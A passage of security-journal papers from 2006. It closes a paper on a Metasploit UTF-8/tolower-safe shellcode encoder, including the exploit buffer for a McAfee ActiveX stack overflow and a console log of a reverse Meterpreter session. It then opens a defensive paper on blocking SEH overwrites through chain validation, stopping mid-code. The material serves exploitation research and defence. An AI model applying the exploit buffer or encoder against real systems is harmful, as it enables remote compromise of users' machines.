carry = prev_carry
if (b > 0x80)
diff = 0x100 - b
y = rand(0x80 - diff - 1).to_i + 1
x = (0x100 - (b - y + carry))
carry = 1
else
diff = 0x7f - b
x = rand(diff - 1) + 1
y = (b + x + carry) & 0xff
carry = 0
end
end while (is_badchar(state, x) or is_badchar(state, y))
vbuf += [x].pack('C')
ctx += [y].pack('C')
}
buf += vbuf + "\x5f\x29\x39\x03\x0c\x24"
state.context += ctx
return buf
end
Unlike the try_add routine, the try_sub routine is a little bit more
complicated, perhaps unnecessarily. The main reason for this is that
subtracting two 32-bit values has to take into account things like carrying
from one digit to another. The basic idea is the same. Each byte in the block
is enumerated. If the byte is above 0x80, the routine calculates the
difference between 0x100 and the byte. From there, it calculates the y value
as a random number between 1 and 0x80 minus the difference. Using the y value,
it generates the x value as 0x100 minus the byte value minus y plus the current
carry flag. To better understand this, consider the following scenario.
Say that the byte being encoded is 0x84. The difference between 0x100 and 0x84
is 0x7c. A valid value of y could be 0x3, as derived from rand(0x80 - 0x7c -
1) + 1. Given this value for y, the value of x would be, assuming a zero carry
flag, 0x7f. When 0x7f, or x, is subtracted from 0x3, or y, the result is 0x84.
However, if the byte value is less than 0x80, then a different method is used
to select the x and y values. In this case, the difference is calculated as
0x7f minus the value of the current byte. The value of x is then assigned a
random value between 1 and the difference. The value of y is then calculated
as the current byte plus x plus the carry flag. For example, if the value is
0x24, then the values could be calculated as described in the following
scenario.
First, the difference between 0x7f and 0x24 is 0x5b. The value of x could be
0x18, as derived from rand(0x5b - 1) + 1. From there, the value of y would be
calculated as 0x3c, as derived from 0x24 + 0x18. Therefore, 0x3c - 0x18 is 0x24.
Given these two methods of calculating the individual byte values, it's
possible to encode all bytes with the exception of 0x7f, 0x80, and 0x81. If any
one of these three bytes is encountered, the try_sub routine will return nil
and the encoding will fail. Otherwise, the routine will complete in a fashion
similar to the try_add routine. However, rather than using an add instruction,
it uses the sub instruction.
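The per-byte arithmetic above can be sanity-checked in isolation. The sketch
below (sub_encode is a hypothetical name; it is a simplified, deterministic
version of try_sub's byte loop, with fixed choices instead of rand and no
bad-character retry loop) encodes one block and confirms that a single 32-bit
subtract, like the generated sub [ecx], edi, recovers the original block:

```ruby
# Simplified, deterministic sketch of try_sub's byte arithmetic; the
# rand-based selection and bad-character retries are omitted here.
def sub_encode(block)
  x_bytes, y_bytes = [], []
  carry = 0
  block.each_byte do |b|
    raise "unencodable byte" if [0x7f, 0x80, 0x81].include?(b)
    if b > 0x80
      y = 1                        # any y in the valid range works
      x = 0x100 - (b - y + carry)
      carry = 1                    # borrow propagates to the next byte
    else
      x = 1                        # any x in the valid range works
      y = (b + x + carry) & 0xff
      carry = 0
    end
    x_bytes << x
    y_bytes << y
  end
  [x_bytes.pack('C*'), y_bytes.pack('C*')]
end

block = "\x42\x20\x9c\x78"         # arbitrary 4-byte test block
x, y = sub_encode(block)

# The decoder's 32-bit subtract: y dword minus x dword, little-endian.
decoded = (y.unpack('V')[0] - x.unpack('V')[0]) & 0xffffffff
decoded == block.unpack('V')[0]    # => true
```

Note that the per-byte borrows line up with how the processor performs the
32-bit subtraction, which is why one sub instruction decodes the whole dword.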
4.3) encode_end
With all the encoding cruft out of the way, the final method that needs to be
overridden is encode_end. In this method, the state.context attribute is
appended to the state.encoded. The purpose of the state.context attribute is
to hold all of the encoded data blocks that are created over the course of
encoding each block. The state.encoded attribute is the actual decoder
including the stub header, the decode transformations, and finally, the encoded
data blocks.
def encode_end(state)
state.encoded += state.context
end
Once encoding completes, the result might be a disassembly that looks something
like this:
$ echo -ne "\x42\x20\x80\x78\xcc\xcc\xcc\xcc" | \
./msfencode -e x86/avoid_utf8_tolower -t raw | \
ndisasm -u -
[*] x86/avoid_utf8_tolower succeeded, final size 47
00000000 6A02 push byte +0x2
00000002 6B3C240B imul edi,[esp],byte +0xb
00000006 60 pusha
00000007 030C24 add ecx,[esp]
0000000A 6A11 push byte +0x11
0000000C 030C24 add ecx,[esp]
0000000F 6A04 push byte +0x4
00000011 683C0C190D push dword 0xd190c3c
00000016 5F pop edi
00000017 0139 add [ecx],edi
00000019 030C24 add ecx,[esp]
0000001C 68696A6060 push dword 0x60606a69
00000021 5F pop edi
00000022 0139 add [ecx],edi
00000024 030C24 add ecx,[esp]
00000027 06 push es
00000028 1467 adc al,0x67
0000002A 6B63626C imul esp,[ebx+0x62],byte +0x6c
0000002E 6C insb
5) Applying the Encoder
The whole reason that this encoder was originally needed was to take advantage
of the vulnerability in the McAfee Subscription Manager ActiveX control. Now
that the encoder has been implemented, all that's left is to try it out and see
if it works. To test this against a Windows XP SP0 target, the overflow buffer
might be constructed as follows.
First, a string of 2972 random text characters must be generated. The return
address should follow the random character string. An example of a valid
return address for this target is 0x7605122f which is the location of a jmp esp
instruction in shell32.dll. Immediately following the return address in the
overflow buffer should be a series of five instructions:
00000000 60 pusha
00000001 6A01 push byte +0x1
00000003 6A01 push byte +0x1
00000005 6A01 push byte +0x1
00000007 61 popa
The purpose of this series of instructions is to cause the value of esp at the
time that the pusha occurs to be popped into the ecx register. As the reader
should recall, the ecx register is used as the base address for the decoder
stub. However, since esp doesn't actually point to the base address of the
decoder stub, the encoder must be informed that 8 extra bytes must be added to
ecx when accounting for the extra offset into the encoded data blocks. This is
conveyed by setting the BufferOffset value to 8. After these five instructions
should come the encoded version of the payload. To better visualize this,
consider the following snippet from the exploit:
buf =
Rex::Text.rand_text(2972, payload_badchars) +
[ ret ].pack('V') +
"\x60" + # pusha
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
"\x61" + # popa
p.encoded
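Why this pusha / push x3 / popa sequence leaves the pusha-time esp in ecx can
be modeled with a toy stack (popa_trick is an illustrative name; register
values here are placeholders, and only the slot arithmetic matters):

```ruby
# Toy stack model of the pusha / push x3 / popa trick. pusha stores
# eax, ecx, edx, ebx, esp, ebp, esi, edi in that order; popa restores
# them in reverse, discarding the slot where it expects the saved esp.
def popa_trick(esp_at_pusha)
  stack = []

  # pusha pushes the eight registers, edi ending up on top
  [:eax, :ecx, :edx, :ebx, esp_at_pusha, :ebp, :esi, :edi].each do |v|
    stack.push(v)
  end

  # the three "push byte 0x1" instructions add three more slots
  3.times { stack.push(0x1) }

  # popa pops edi, esi, ebp, skips one slot, then ebx, edx, ecx, eax --
  # but everything is now shifted down by the three extra pushes
  regs = {}
  [:edi, :esi, :ebp].each { |r| regs[r] = stack.pop }
  stack.pop # the discarded "saved esp" slot
  [:ebx, :edx, :ecx, :eax].each { |r| regs[r] = stack.pop }
  regs
end

regs = popa_trick(0x0012ffc0)
regs[:ecx] == 0x0012ffc0   # => true: ecx holds esp as of the pusha
```

The three extra pushes shift the popa window so that the slot holding the
saved esp is popped into ecx instead of being skipped.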
With the overflow buffer ready to go, the only thing left to do is fire off
an exploit attempt by having the machine browse to the malicious website:
msf exploit(mcafee_mcsubmgr_vsprintf) > exploit
[*] Started reverse handler
[*] Using URL: http://x.x.x.3:8080/foo
[*] Server started.
[*] Exploit running as background job.
msf exploit(mcafee_mcsubmgr_vsprintf) >
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (x.x.x.3:4444 -> x.x.x.105:2010)
msf exploit(mcafee_mcsubmgr_vsprintf) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
6) Conclusion
The purpose of this paper was to illustrate the process of implementing a
custom encoder for the x86 architecture. In particular, the encoder
described in this paper was designed to make it possible to encode payloads in
a UTF-8 and tolower safe format. To help illustrate the usefulness of such an
encoder, a recent vulnerability in the McAfee Subscription Manager ActiveX
control was used because of its restrictions on uppercase characters. While
many readers may never find it necessary to implement an encoder, it's
nevertheless a necessary topic to understand for those who are interested in
exploitation research.
A. References
eEye. McAfee Subscription Manager Stack Buffer Overflow.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html;
accessed Aug 26, 2006.
Metasploit Staff. Metasploit 3.0 Developer's Guide.
http://www.metasploit.com/projects/Framework/msf3/developers_guide.pdf;
accessed Aug 26, 2006.
Spoonm. Recent Shellcode Developments.
http://www.metasploit.com/confs/recon2005/recent_shellcode_developments-recon05.pdf;
accessed Aug 26, 2006.
SkyLined. Alpha 2.
http://www.edup.tudelft.nl/ bjwever/documentation_alpha2.html.php;
accessed Aug 26, 2006.
uninformed/5.2.txt
Preventing the Exploitation of SEH Overwrites
9/2006
skape
mmiller@hick.org
1) Foreword
Abstract: This paper proposes a technique that can be used to prevent
the exploitation of SEH overwrites on 32-bit Windows applications
without requiring any recompilation. While Microsoft has attempted to
address this attack vector through changes to the exception dispatcher
and through enhanced compiler support, such as with /SAFESEH and /GS,
the majority of benefits they offer are limited to image files that have
been compiled to make use of the compiler enhancements. This limitation
means that without all image files being compiled with these
enhancements, it may still be possible to leverage an SEH overwrite to
gain code execution. In particular, many third-party applications are
still vulnerable to SEH overwrites even on the latest versions of
Windows because they have not been recompiled to incorporate these
enhancements. To that point, the technique described in this paper does
not rely on any compile time support and instead can be applied at
runtime to existing applications without any noticeable performance
degradation. This technique is also backward compatible with all
versions of Windows NT+, thus making it a viable and proactive solution
for legacy installations.
Thanks: The author would like to thank all of the people who have helped
with offering feedback and ideas on this technique. In particular, the
author would like to thank spoonm, H D Moore, Skywing, Richard Johnson,
and Alexander Sotirov.
2) Introduction
Like other operating systems, the Windows operating system finds itself
vulnerable to the same classes of vulnerabilities that affect other
platforms, such as stack-based buffer overflows and heap-based buffer
overflows. Where the platforms differ is in terms of how these
vulnerabilities can be leveraged to gain code execution. In the case of
a conventional stack-based buffer overflow, the overwriting of the
return address is the most obvious and universal approach. However,
unlike other platforms, the Windows platform has a unique vector that
can, in many cases, be used to gain code execution through a stack-based
overflow that is more reliable than overwriting the return address.
This vector is known as a Structured Exception Handler (SEH) overwrite.
This attack vector was publicly discussed for the first time, as far as
the author is aware, by David Litchfield in his paper entitled Defeating
the Stack Based Buffer Overflow Prevention Mechanism of Microsoft
Windows 2003 Server. However, exploits had been using this technique
prior to the publication, so it is unclear who originally found the
technique.
In order to completely understand how to go about protecting against SEH
overwrites, it's prudent to first spend some time describing the
intention of the facility itself and how it can be abused to gain code
execution. To provide this background information, a description of
structured exception handling will be given in section 2.1. Section 2.2
provides an illustration of how an SEH overwrite can be used to gain
code execution. If the reader already understands how structured
exception handling works and can be exploited, feel free to skip ahead.
The design of the technique that is the focus of this paper will be
described in chapter 3 followed by a description of a proof of concept
implementation in chapter 4. Finally, potential compatibility issues are
noted in chapter 5.
2.1) Structured Exception Handling
Structured Exception Handling (SEH) is a uniform system for dispatching
and handling exceptions that occur during the normal course of a
program's execution. This system is similar in spirit to the way that
UNIX derivatives use signals to dispatch and handle exceptions, such as
through SIGPIPE and SIGSEGV. SEH, however, is a more generalized and
powerful system for accomplishing this task, in the author's opinion.
Microsoft's integration of SEH spans both user-mode and kernel-mode and
is a licensed implementation of what is described in a patent owned by
Borland. In fact, this patent is one of the reasons why open source
operating systems have not chosen to integrate this style of exception
dispatching.
In terms of implementation, structured exception handling works by
defining a uniform way of handling all exceptions that occur during the
normal course of process execution. In this context, an exception is
defined as an event that occurs during execution that necessitates some
form of extended handling. There are two primary types of exceptions.
The first type, known as a hardware exception, is used to categorize
exceptions that originate from hardware. For example, when a program
makes reference to an invalid memory address, the processor will raise
an exception through an interrupt that gives the operating system an
opportunity to handle the error. Other examples of hardware exceptions
include illegal instructions, alignment faults, and other
architecture-specific issues. The second type of exception is known as
a software exception. A software exception, as one might expect,
originates from software rather than from the hardware. For example, in
the event that a process attempts to close an invalid handle, the
operating system may generate an exception.
One of the reasons that the word structured is included in structured
exception handling is because of the fact that it is used to dispatch
both hardware and software exceptions. This generalization makes it
possible for applications to handle all types of exceptions using a
common system, thus allowing for greater application flexibility when it
comes to error handling.
The most important detail of SEH, insofar as it pertains to this
document, is the mechanism through which applications can dynamically
register handlers to be called when various types of exceptions occur.
The act of registering an exception handler is most easily described as
inserting a function pointer into a chain of function pointers that are
called whenever an exception occurs. Each exception handler in the
chain is given the opportunity to either handle the exception or pass it
on to the next exception handler.
At a higher level, the majority of compiler-generated C/C++ functions
will register exception handlers in their prologue and remove them in
their epilogue. In this way, the exception handler chain mirrors the
structure of a thread's stack in that they are both LIFOs
(last-in-first-out). The exception handler that was registered last
will be the first to be removed from the chain, much the same as the last
function to be called will be the first to return.
To understand how the process of registering an exception handler
actually works in practice, it makes sense to analyze code that makes
use of exception handling. For instance, the code below illustrates what
would be required to catch all exceptions and then display the type of
exception that occurred:
__try
{
...
} __except(EXCEPTION_EXECUTE_HANDLER)
{
printf("Exception code: %.8x\n", GetExceptionCode());
}
In the event that an exception occurs from code inside of the __try / __except
block, the printf call will be issued and GetExceptionCode will return the
actual exception that occurred. For instance, if code made reference to an
invalid memory address, the exception code would be 0xc0000005, or
EXCEPTION_ACCESS_VIOLATION. To completely understand how this works, it is
necessary to dive deeper and take a look at the assembly that is generated from
the C code described above. When disassembled, the code looks something like
what is shown below:
00401000 55 push ebp
00401001 8bec mov ebp,esp
00401003 6aff push 0xff
00401005 6818714000 push 0x407118
0040100a 68a4114000 push 0x4011a4
0040100f 64a100000000 mov eax,fs:[00000000]
00401015 50 push eax
00401016 64892500000000 mov fs:[00000000],esp
0040101d 83c4f4 add esp,0xfffffff4
00401020 53 push ebx
00401021 56 push esi
00401022 57 push edi
00401023 8965e8 mov [ebp-0x18],esp
00401026 c745fc00000000 mov dword ptr [ebp-0x4],0x0
0040102d c6050000000001 mov byte ptr [00000000],0x1
00401034 c745fcffffffff mov dword ptr [ebp-0x4],0xffffffff
0040103b eb2b jmp ex!main+0x68 (00401068)
0040103d 8b45ec mov eax,[ebp-0x14]
00401040 8b08 mov ecx,[eax]
00401042 8b11 mov edx,[ecx]
00401044 8955e4 mov [ebp-0x1c],edx
00401047 b801000000 mov eax,0x1
0040104c c3 ret
0040104d 8b65e8 mov esp,[ebp-0x18]
00401050 8b45e4 mov eax,[ebp-0x1c]
00401053 50 push eax
00401054 6830804000 push 0x408030
00401059 e81b000000 call ex!printf (00401079)
0040105e 83c408 add esp,0x8
00401061 c745fcffffffff mov dword ptr [ebp-0x4],0xffffffff
00401068 8b4df0 mov ecx,[ebp-0x10]
0040106b 64890d00000000 mov fs:[00000000],ecx
00401072 5f pop edi
00401073 5e pop esi
00401074 5b pop ebx
00401075 8be5 mov esp,ebp
00401077 5d pop ebp
00401078 c3 ret
The actual registration of the exception handler all occurs behind the scenes
in the C code. However, in the assembly code, the registration of the
exception handler starts at 0x0040100a and spans four instructions. It is
these four instructions that are responsible for registering the exception
handler for the calling thread. The way that this actually works is by
chaining an EXCEPTION_REGISTRATION_RECORD to the front of the list of exception
handlers. The head of the list of already registered exception handlers is
found in the ExceptionList attribute of the NT_TIB structure. If no exception
handlers are registered, this value will be set to 0xffffffff. The NT_TIB
structure makes up the first part of the TEB, or Thread Environment Block,
which is an undocumented structure used internally by Windows to keep track of
per-thread state in user-mode. A thread's TEB can be accessed in a
position-independent fashion by referencing addresses relative to the fs
segment register. For example, the head of the exception list chain can be
obtained through fs:[0].
To make sense of the four assembly instructions that register the custom
exception handler, each of the four instructions will be described
individually. For reference purposes, the layout of the
EXCEPTION_REGISTRATION_RECORD is described below:
+0x000 Next : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+0x004 Handler : Ptr32
1. push 0x4011a4
The first instruction pushes the address of the CRT-generated _except_handler3
symbol. This routine is responsible for dispatching general exceptions that
are registered through the __except compiler intrinsic. The key thing to note
here is that the virtual address of a function is pushed onto the stack that is
expected to be referenced in the event that an exception is thrown. This push
operation is the first step in dynamically constructing an
EXCEPTION_REGISTRATION_RECORD on the stack by first setting the Handler
attribute.
2. mov eax,fs:[00000000]
The second instruction takes the current pointer to the first
EXCEPTION_REGISTRATION_RECORD and stores it in eax.
3. push eax
The third instruction takes the pointer to the first exception registration
record in the exception list and pushes it onto the stack. This, in turn, sets
the Next attribute of the record that is being dynamically generated on the
stack. Once this instruction completes, a populated
EXCEPTION_REGISTRATION_RECORD will exist on the stack that takes the following
form:
+0x000 Next : 0x0012ffb0
+0x004 Handler : 0x004011a4 ex!_except_handler3+0
4. mov fs:[00000000],esp
Finally, the dynamically generated exception registration record is stored as
the first exception registration record in the list for the current thread.
This completes the process of inserting a new registration record into the
chain of exception handlers.
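In higher-level terms, those four instructions amount to a linked-list
insertion at the head, which might be sketched as follows (SehRecord is an
illustrative stand-in for the EXCEPTION_REGISTRATION_RECORD layout shown
above, and the list head stands in for fs:[0]):

```ruby
# Minimal model of exception handler registration: each record holds a
# Next pointer and a Handler, and new records are linked in at the head.
SehRecord = Struct.new(:next_rec, :handler)

exception_list = SehRecord.new(nil, :default_handler) # stand-in for fs:[0]

# push 0x4011a4; mov eax, fs:[0]; push eax -> record built on the stack,
# Handler set first, then Next pointed at the old head
new_record = SehRecord.new(exception_list, :_except_handler3)

# mov fs:[0], esp -> the new record becomes the head of the chain
exception_list = new_record
```

Unregistering in the epilogue is the mirror image: the head is simply reset
to the record's Next pointer, giving the chain its LIFO behavior.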
The important things to take away from this description of exception handler
registration are as follows. First, the registration of exception handlers is
a runtime operation. This means that whenever a function is entered that makes
use of an exception handler, it must dynamically register the exception
handler. This has implications as it relates to performance overhead. Second,
the list of registered exception handlers is stored on a per-thread basis.
This makes sense because threads are considered isolated units of execution and
therefore exception handlers are only relative to a particular thread. The
final, and perhaps most important, thing to take away from this is that the
assembly generated by the compiler to register an exception handler at runtime
makes use of the current thread's stack. This fact will be revisited later in
this section.
In the event that an exception occurs during the course of normal execution,
the operating system will step in and take the necessary steps to dispatch the
exception. In the event that the exception occurred in the context of a thread
that is running in user-mode, the kernel will take the exception information
and generate an EXCEPTION_RECORD that is used to encapsulate all of the
exception information. Furthermore, a snapshot of the executing state of the
thread is created in the form of a populated CONTEXT structure. The kernel
then passes this information off to the user-mode thread by transferring
execution from the location that the fault occurred at to the address of
ntdll!KiUserExceptionDispatcher. The important thing to understand about this
is that execution of the exception dispatcher occurs in the context of the
thread that generated the exception.
The job of ntdll!KiUserExceptionDispatcher is, as the name implies, to dispatch
user-mode exceptions. As one might guess, the way that it goes about doing
this is by walking the chain of registered exception handlers stored relative
to the current thread. As the exception dispatcher walks the chain, it calls the
handler associated with each registration record, giving that handler the
opportunity to handle, fail, or pass on the exception.
While there are other things involved in the exception dispatching process,
this description will suffice to set the stage for how it might be abused to
gain code execution.
2.2) Gaining Code Execution
There is one important thing to remember when it comes to trying to gain code
execution through an SEH overwrite. Put simply, the fact that each exception
registration record is stored on the stack lends itself well to abuse when
considered in conjunction with a conventional stack-based buffer overflow. As
described in section 2.1, each exception registration record is composed of a Next
pointer and a Handler function pointer. Of most interest in terms of
exploitation is the Handler attribute. Since the exception dispatcher makes use
of this attribute as a function pointer, it makes sense that should this
attribute be overwritten with attacker controlled data, it would be possible to
gain code execution. In fact, that's exactly what happens, but with an added
catch.
While typical stack-based buffer overflows work by overwriting the return
address, an SEH overwrite works by overwriting the Handler attribute of an
exception registration record that has been stored on the stack. Unlike
overwriting the return address, where control is gained immediately upon return
from the function, an SEH overwrite does not actually gain code execution until
after an exception has been generated. The exception is necessary in order to
cause the exception dispatcher to call the overwritten Handler.
While this may seem like something of a nuisance that would make SEH overwrites
harder to exploit, it's not. Generating an exception that leads to the calling
of the Handler is as simple as overwriting the return address with an invalid
address in most cases. When the function returns, it attempts to execute code
from an invalid memory address which generates an access violation exception.
This exception is then passed onto the exception dispatcher which calls the
overwritten Handler.
The obvious question to ask at this point is what benefit SEH overwrites have
over the conventional practice of overwriting the return address. To
understand this, it's important to consider one of the common practices
employed in Windows-based exploits. On Windows, thread stack addresses tend to
change quite frequently between operating system revisions and even across
process instances. This differs from most UNIX derivatives where stack
addresses are typically predictable across multiple operating system revisions.
Due to this fact, most Windows-based exploits will indirectly transfer control
into the thread's stack by first bouncing off an instruction that exists
somewhere in the address space. This instruction must typically reside at an
address that is less prone to change, such as within the code section of a
binary. The purpose of this instruction is to transfer control back to the
stack in a position-independent fashion. For example, a jmp esp instruction
might be used. While this approach works perfectly fine, it's limited by
whether or not an instruction can be located that is both portable and reliable
in terms of the address that it resides at. This is where the benefits of SEH
overwrites begin to become clear.
When simply overwriting the return address, an attacker is often limited to a
small set of instructions that are not typically common to find at a reliable
and portable location in the address space. On the other hand, SEH overwrites
have the advantage of being able to use another set of instructions that are
far more prevalent in the address space of most every process. This set of
instructions is commonly referred to as pop/pop/ret. The reason this class of
instructions can be used with SEH overwrites and not general stack overflows
has to do with the method in which exception handlers are called by the
exception dispatcher. To understand this, it is first necessary to know what
the specific prototype is for the Handler field in the
EXCEPTION_REGISTRATION_RECORD structure:
typedef EXCEPTION_DISPOSITION (*ExceptionHandler)(
IN EXCEPTION_RECORD ExceptionRecord,
IN PVOID EstablisherFrame,
IN PCONTEXT ContextRecord,
IN PVOID DispatcherContext);
The field of most importance is the EstablisherFrame. This field actually
points to the address of the exception registration record that was pushed onto
the stack. It is also located at [esp+8] when the Handler is called.
Therefore, if the Handler is overwritten with the address of a pop/pop/ret
sequence, the result will be that the execution path of the current thread will
be transferred to the address of the Next attribute for the current exception
registration record. While this field would normally hold the address of the
next registration record, it instead can hold four bytes of arbitrary code that
an attacker can supply when triggering the SEH overwrite. Since there are only
four contiguous bytes of memory to work with before hitting the Handler field,
most attackers will use a simple short jump sequence to jump past the handler
and into the attacker controlled code that comes after it.
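The control transfer can be modeled with a toy stack. When the overwritten
Handler is invoked, the stack holds the dispatcher's return address followed
by the four arguments from the prototype above, so two pops and a ret land on
EstablisherFrame (pop_pop_ret is an illustrative name for this sketch):

```ruby
# Toy model of a pop/pop/ret sequence: two pops discard the top two
# stack slots, and ret "jumps" to whatever is left at [esp].
def pop_pop_ret(stack)
  stack.shift             # pop reg -- discards the return address
  stack.shift             # pop reg -- discards ExceptionRecord
  stack.shift             # ret     -- transfers control to [esp]
end

# Stack layout at the moment the overwritten Handler gains control,
# following the Handler prototype: return address, then the arguments.
frame = [:return_address, :exception_record, :establisher_frame,
         :context_record, :dispatcher_context]

pop_pop_ret(frame)   # => :establisher_frame, the record's Next field
```

Since EstablisherFrame is the address of the registration record itself, the
ret resumes execution at the Next field, where the attacker has staged the
short jump described above.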
3) Design
The one basic requirement of any solution attempting to prevent the leveraging
of SEH overwrites is that it must not be possible for an attacker to be able to
supply a value for the Handler attribute of an exception registration record
that is subsequently used in an unchecked fashion by the exception dispatcher
when an exception occurs. If a solution can claim to have satisfied this
requirement, then it should be true that the solution is secure.
To that point, Microsoft's solution is secure, but only if all of the images
loaded in the address space have been compiled with /SAFESEH. Even then, it's
possible that it may not be completely secure. For example, it should be
possible to overwrite the Handler with the address of some non-image associated
executable region, if one can be found. If there are any images that have not
been compiled with /SAFESEH, it may be possible for an attacker to overwrite
the Handler with an address of an instruction that resides within an
unprotected image. The reason Microsoft's implementation cannot protect
against this is because SafeSEH works by having the exception dispatcher
validate handlers against a table of image-specific safe exception handlers
prior to calling an exception handler. Safe exception handlers are stored in a
table that is contained in any executable compiled with /SAFESEH. Given this
limitation, it can also be said that Microsoft's implementation is not secure
given the appropriate conditions. In fact, for third-party applications, and
even some Microsoft-provided applications, these conditions are considered by
the author to be the norm rather than the exception. In the end, it all boils
down to the fact that Microsoft's solution is a compile-time solution rather
than a runtime solution. With these limitations in mind, it makes sense to
attempt to approach the problem from the angle of a runtime solution rather
than a compile-time solution.
When it comes to designing a runtime solution, the important consideration that
has to be made is that it will be necessary to intercept exceptions before they
are passed off to the registered exception handlers by the exception
dispatcher. The particulars of how this can be accomplished will be discussed
in chapter 4. Assuming a solution is found to the layering problem, the next
step is to come up with a solution for determining whether or not an exception
handler is valid and has not been tampered with. While there are many
inefficient solutions to this problem, such as coming up with a solution to
keep a ``secure'' list of registered exception handlers, there is one solution
in particular that the author feels is best suited for the problem.
One of the side effects of an SEH overwrite is that the attacker will typically
clobber the value of the Next attribute associated with the exception
registration record that is overwritten. This occurs because the Next
attribute precedes the Handler attribute in memory, and therefore must be
overwritten before the Handler in the case of a typical buffer overflow. This
has a very important side effect that is the key to facilitating the
implementation of a runtime solution. In particular, the clobbering of the
Next attribute means that all subsequent exception registration records would
not be reachable by the exception dispatcher when walking the chain.
Consider for the moment a solution that, during thread startup, places a custom
exception registration record as the very last exception registration record in
the chain. This exception registration record will be symbolically referred to
as the validation frame henceforth. From that point forward, whenever an
exception is about to be dispatched, the solution could walk the chain prior to
allowing the exception dispatcher to handle the exception. The purpose of
walking the chain before hand is to ensure that the validation frame can be
reached. As such, the validation frame's purpose is similar to that of stack
canaries. If the validation frame can be reached, then that is evidence of the
fact that the chain of exception handlers has not been corrupted. As described
above, the act of overwriting the Handler attribute also requires that the Next
pointer be overwritten. If the Next pointer is not overwritten with an address
that ensures the integrity of the exception handler chain, then this solution
can immediately detect that the integrity of the chain is in question and
prevent the exception dispatcher from calling the overwritten Handler.
Using this technique, the act of ensuring that the integrity of the exception
handler chain is kept intact results in the ability to prevent SEH overwrites.
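The chain walk itself can be sketched with a toy model (Frame and
chain_intact? are illustrative names; a real implementation would walk
EXCEPTION_REGISTRATION_RECORDs from fs:[0] and compare addresses):

```ruby
# Toy model of validation-frame checking. Frames form a singly linked
# list; the validation frame is installed at the tail during thread
# startup, and dispatching is refused unless the walk still reaches it.
Frame = Struct.new(:next_frame, :handler)

def chain_intact?(head, validation_frame)
  frame = head
  while frame
    return true if frame.equal?(validation_frame)
    frame = frame.next_frame
  end
  false
end

validation = Frame.new(nil, :validation_handler)
app        = Frame.new(validation, :app_handler)
head       = Frame.new(app, :crt_handler)

chain_intact?(head, validation)   # => true

# An SEH overwrite clobbers Next before reaching Handler; the clobbered
# pointer (modeled here as nil) breaks the walk to the validation frame.
app.next_frame = nil
app.handler    = :pop_pop_ret_address
chain_intact?(head, validation)   # => false
```

In the broken case the dispatcher never reaches the validation frame, so the
overwritten Handler is never called.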
The important questions to ask at this point center around what limitations
this solution might have. The most obvious question to ask is what's to stop
an attacker from simply overwriting the Next pointer with the value that was
already there. There are a few things that stop this. First of all, it will
be common that the attacker does not know the value of the Next pointer.
Second, and perhaps most important, is that one of the benefits of using an SEH
overwrite is that an attacker can make use of a pop/pop/ret sequence. By
forcing an attacker to retain the value of the Next pointer, the major benefit
of using an SEH overwrite in the first place is gone. Even conceding this
point, an attacker who is able to retain the value of the Next pointer would
find themselves limited to overwriting the Handler with the address of
instructions that indirectly transfer control back to their code. However, the
attacker won't simply be able to use an instruction like jmp esp because the
Handler will be called in the context of the exception dispatcher. It's at
this point that diminishing returns are reached and an attacker is better off
simply overwriting the return address, if possible.
Another important question to ask is what's to stop the attacker from
overwriting the Next pointer with the address of the validation frame itself
or, more easily, with 0xffffffff. The answer to this is much the same as
described in the above paragraph. Specifically, by forcing an attacker away
from the pop/pop/ret sequence, the usefulness of the SEH overwrite vector
quickly degrades to the point of it being better to simply overwrite the return
address, if possible. However, in order to be sure, the author feels that
implementations of this solution would be wise to randomize the location of the
validation frame.
It is the author's opinion that the solution described above satisfies the
requirement outlined in the beginning of this chapter and therefore qualifies
as a secure solution. However, there's always a chance that something has been
missed. For that reason, the author is more than happy to be proven wrong on
this point.
4) Implementation
The implementation of the solution described in the previous chapter relies on
intercepting exceptions prior to allowing the native exception dispatcher to
handle them such that the exception handler chain can be validated. First and
foremost, it is important to identify a way of layering prior to the point that
the exception dispatcher transfers control to the registered exception
handlers. There are a few different places that this layering could occur at,
but the one that is best suited to catch the majority of user-mode exceptions
is at the location that ntdll!KiUserExceptionDispatcher gains control.
However, by hooking ntdll!KiUserExceptionDispatcher, it is possible that this
implementation may not be able to intercept all cases of an exception being
raised, thus making it potentially feasible to bypass the exception handler
chain validation.
The best location to layer at would be ntdll!RtlDispatchException. The
reason for this is that exceptions raised through ntdll!RtlRaiseException, such
as software exceptions, may be passed directly to ntdll!RtlDispatchException
rather than going through ntdll!KiUserExceptionDispatcher first. The condition
that controls this is whether or not a debugger is attached to the user-mode
process when ntdll!RtlRaiseException is called. The reason
ntdll!RtlDispatchException is not hooked in this implementation is because it
is not directly exported. There are, however, fairly reliable techniques that
could be used to determine its address. As far as the author is aware, the act
of hooking ntdll!KiUserExceptionDispatcher should mean that it's only possible
to miss software exceptions which are much harder, and in most cases
impossible, for an attacker to generate.
In order to layer at ntdll!KiUserExceptionDispatcher, the first few
instructions of its prologue can be overwritten with an indirect jump to a
function that will be responsible for performing any sanity checks necessary.
Once the function has completed its sanity checks, it can transfer control back
to the original exception dispatcher by executing the overwritten instructions
and then jumping back into ntdll!KiUserExceptionDispatcher at the offset of the
next instruction to be executed. This is a nice and ``clean'' way of
accomplishing this, and the performance overhead is minuscule, where ``clean''
is defined as the best it can get from a third-party perspective.
In order to hook ntdll!KiUserExceptionDispatcher, the first n instructions,
where n is the number of instructions that it takes to cover at least 6 bytes,
must be copied to a location that will be used by the hook to execute the
actual ntdll!KiUserExceptionDispatcher. Following that, the first n
instructions of ntdll!KiUserExceptionDispatcher can then be overwritten with an
indirect jump. This indirect jump will be used to transfer control to the
function that will validate the exception handler chain prior to allowing the
original exception dispatcher to handle the exception.
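As a concrete illustration, the indirect jump described above is typically the
6-byte x86 absolute indirect jump (opcode FF 25 followed by a 32-bit address).
The sketch below is illustrative only and not part of any real hooking
library: it merely assembles those bytes into a buffer. Actually writing them
over ntdll's prologue would additionally require changing page protections and
preserving the copied-out prologue instructions.

```c
#include <stdint.h>
#include <string.h>

/* Illustrative only: build the 6-byte x86 "jmp dword ptr [addr]"
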